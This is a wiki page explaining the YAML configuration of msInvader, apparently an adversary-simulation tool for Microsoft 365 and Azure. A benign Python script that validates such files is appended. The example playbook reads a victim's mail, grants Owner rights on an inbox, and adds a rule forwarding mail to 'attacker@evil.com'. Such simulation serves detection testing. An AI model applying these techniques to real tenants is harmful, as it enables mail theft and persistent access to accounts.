
msInvader Configuration File

mvelazco edited this page Dec 17, 2024 · 15 revisions

msInvader reads everything it needs for a simulation from a single YAML configuration file: the tenant to target, the credentials (sessions) to authenticate with, and the techniques to run.

Configuration Structure

The YAML configuration file for msInvader now consists of two main sections: authentication and playbooks. Here's an overview of the updated file structure:

authentication:
  # Tenant-level authentication details
  sessions:
    # Reusable authentication contexts

playbooks:
  # Playbooks containing techniques and their parameters

Authentication Section

This section contains tenant-level details required for msInvader to interact with M365 and Azure environments. It now includes a sessions subsection, which defines reusable authentication contexts for different users or accounts.

Fields Description:

  • tenant_id: The unique identifier (GUID) of the Azure or O365 tenant that msInvader authenticates against. Required for all authentication flows.

Sessions Subsection

The sessions subsection defines reusable authentication contexts under the authentication section. Each session specifies the authentication type and relevant credentials.

Fields Description:

  • type: The authentication flow to use. Supported types:
    • resource_owner: Resource Owner Password Credentials (ROPC) flow. Requires username and password. Because ROPC is non-interactive it cannot satisfy MFA, so it only works for accounts without an MFA requirement.
    • device_code: Device Code flow (supports MFA-enabled accounts). Requires username; the sign-in is completed interactively in a browser.
    • client_credentials: Client Credentials flow for an application (service principal), as in the example below. Requires app_id and secret.
  • username: The username or email address for authentication (resource_owner and device_code).
  • password: The password for the Resource Owner Password Credentials flow.
  • app_id: The application (client) ID of the service principal for the client_credentials flow.
  • secret: The client secret of the service principal for the client_credentials flow.

Example:

authentication:
  tenant_id: "e523a1f3-31dc-45be-94ab-6a97be8d8cf8"
  sessions:
    compromised_user_1:
      type: "resource_owner"
      username: "victim1@contoso.com"
      password: "SuperPass!!!"
    compromised_user_2:
      type: "device_code"
      username: "victim2@contoso.com"
    compromised_service_principal:
      type: "client_credentials"
      app_id: "10c8885b-1c37-4a4a-8adc-a5e507e403a8"
      secret: "SuperSPS3cret"

Playbooks Section

The playbooks section groups techniques into logical workflows, making it easier to simulate adversary scenarios. Each playbook has a name, description, and a list of techniques.

Fields Description:

  • name: The name of the playbook.
  • description: A brief explanation of the playbook's purpose.
  • techniques: A list of techniques to simulate.
    • technique: Name of the technique.
    • enabled: Boolean (True or False). Techniques set to False stay in the file but are skipped when the playbook runs.
    • parameters: Nested key-value pairs defining technique-specific settings.
      • session: The name of a session defined under authentication.sessions; the technique authenticates with that session's credentials.
      • access_method: The API the technique is executed through: graph (Microsoft Graph), ews (Exchange Web Services), or rest.

Example:

playbooks:
  - name: "M365 Adversary Simulation"
    description: "Simulate email manipulation techniques."
    techniques:
      - technique: "read_email"
        enabled: True
        parameters:
          session: "compromised_user_1"
          access_method: "graph"
          mailbox: "victim1@contoso.com"
          limit: 10

      - technique: "create_rule"
        enabled: True
        parameters:
          session: "compromised_user_1"
          access_method: "graph"
          mailbox: "victim1@contoso.com"
          rule_name: "Forward Emails"
          forward_to: "attacker@evil.com"

      - technique: "add_folder_permission"
        enabled: True
        parameters:
          session: "compromised_user_2"
          access_method: "rest"
          mailbox: "victim2@contoso.com"
          folder: "Inbox"
          grantee: "Default"
          access_rights: "Owner"

Configuring Your File

  1. Define Authentication: Start by setting up the authentication section (tenant_id and at least one session) so msInvader can authenticate with the necessary services. The file holds plaintext passwords and client secrets, so keep it out of version control and restrict its file permissions.
  2. Select Techniques: Activate the techniques you wish to simulate by setting enabled to True and filling out their respective parameters. Each technique's session value must match a session name defined in the authentication section.
  3. Customize Parameters: Adjust each technique's parameters to tailor the simulation to your specific needs and scenarios.
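The three steps above are easy to get subtly wrong (a session name typo, a wrong access_method, a client_credentials session without a secret), and the error only surfaces when the playbook runs against the tenant. The following Python script is an added example, not part of the msInvader project: it validates a configuration against the field rules described on this page before you run anything. The function names (load_config, validate_config), the two sample configurations, and the decision to treat an unused session as a warning are assumptions made for this example.

```python
"""Validator for an msInvader-style YAML configuration file.

Added example, not msInvader code. Checks follow the field descriptions on
this page; function names and sample configs are assumptions.
"""
from __future__ import annotations

import copy
import re

GUID_RE = re.compile(r"^[0-9a-f]{8}(-[0-9a-f]{4}){3}-[0-9a-f]{12}$", re.I)

# Credential fields each session type must carry, per this page's example.
SESSION_TYPES = {
    "resource_owner": ("username", "password"),
    "device_code": ("username",),
    "client_credentials": ("app_id", "secret"),
}
ACCESS_METHODS = {"graph", "ews", "rest"}


def load_config(path: str) -> dict:
    """Parse the file with PyYAML's safe_load (never yaml.load on untrusted input)."""
    import yaml  # lazy import so validate_config() needs no third-party package
    with open(path, encoding="utf-8") as fh:
        return yaml.safe_load(fh) or {}


def validate_config(cfg: dict) -> tuple[list[str], list[str]]:
    """Return (errors, warnings). An empty errors list means the config is usable."""
    errors, warnings = [], []
    auth = cfg.get("authentication")
    if not isinstance(auth, dict):
        return ["authentication: section missing"], warnings

    tenant = auth.get("tenant_id")
    if not isinstance(tenant, str) or not GUID_RE.match(tenant):
        errors.append("authentication.tenant_id: missing or not a GUID")

    sessions = auth.get("sessions") if isinstance(auth.get("sessions"), dict) else {}
    if not sessions:
        errors.append("authentication.sessions: at least one session is required")
    for name, sess in sessions.items():
        stype = sess.get("type") if isinstance(sess, dict) else None
        if stype not in SESSION_TYPES:
            errors.append(f"sessions.{name}: unknown type {stype!r}")
            continue
        for field in SESSION_TYPES[stype]:
            if not sess.get(field):
                errors.append(f"sessions.{name}: {stype} requires {field}")

    playbooks = cfg.get("playbooks") if isinstance(cfg.get("playbooks"), list) else []
    if not playbooks:
        errors.append("playbooks: at least one playbook is required")
    used = set()
    for pi, pb in enumerate(playbooks):
        label = pb.get("name", pi) if isinstance(pb, dict) else pi
        techniques = pb.get("techniques") if isinstance(pb, dict) else None
        if not isinstance(techniques, list):
            errors.append(f"playbooks[{label}]: techniques list missing")
            continue
        for ti, tech in enumerate(techniques):
            where = f"playbooks[{label}].techniques[{ti}]"
            if not isinstance(tech, dict) or not tech.get("technique"):
                errors.append(f"{where}: technique name missing")
                continue
            if not isinstance(tech.get("enabled"), bool):
                errors.append(f"{where}: enabled must be True or False")
            params = tech.get("parameters")
            if not isinstance(params, dict):
                errors.append(f"{where}: parameters mapping missing")
                continue
            if params.get("session") in sessions:
                used.add(params["session"])
            else:
                errors.append(f"{where}: session {params.get('session')!r} is not defined")
            if params.get("access_method") not in ACCESS_METHODS:
                errors.append(f"{where}: access_method must be graph, ews or rest")
    # A session nobody references is a plaintext credential kept in the file for nothing.
    for unused in sorted(set(sessions) - used):
        warnings.append(f"sessions.{unused}: defined but not referenced by any technique")
    return errors, warnings


# Constructed sample mirroring this page's example (all values are placeholders).
SAMPLE_CONFIG = {
    "authentication": {
        "tenant_id": "e523a1f3-31dc-45be-94ab-6a97be8d8cf8",
        "sessions": {
            "compromised_user_1": {"type": "resource_owner", "username": "victim1@contoso.com", "password": "SuperPass!!!"},
            "compromised_user_2": {"type": "device_code", "username": "victim2@contoso.com"},
        },
    },
    "playbooks": [{"name": "M365 Adversary Simulation", "techniques": [
        {"technique": "read_email", "enabled": True, "parameters": {
            "session": "compromised_user_1", "access_method": "graph", "mailbox": "victim1@contoso.com", "limit": 10}},
        {"technique": "add_folder_permission", "enabled": True, "parameters": {
            "session": "compromised_user_2", "access_method": "rest", "mailbox": "victim2@contoso.com",
            "folder": "Inbox", "grantee": "Default", "access_rights": "Owner"}},
    ]}],
}

# Same config with two typical mistakes: a session-name typo and a misspelled API name.
BROKEN_CONFIG = copy.deepcopy(SAMPLE_CONFIG)
BROKEN_CONFIG["playbooks"][0]["techniques"][0]["parameters"]["session"] = "compromised_user1"
BROKEN_CONFIG["playbooks"][0]["techniques"][1]["parameters"]["access_method"] = "graphs"

if __name__ == "__main__":
    import sys
    cfg = load_config(sys.argv[1]) if len(sys.argv) > 1 else BROKEN_CONFIG
    errs, warns = validate_config(cfg)
    for line in errs + [f"warning: {w}" for w in warns]:
        print(line)
    sys.exit(1 if errs else 0)
```

Run it as `python validate_config.py msinvader.yaml` (PyYAML needed only for loading a real file); with no argument it validates the deliberately broken in-memory sample and reports the undefined session, the bad access_method, and a warning that compromised_user_1 is now defined but unused. A non-zero exit status makes the check usable as a pre-flight step in a lab runbook or CI job.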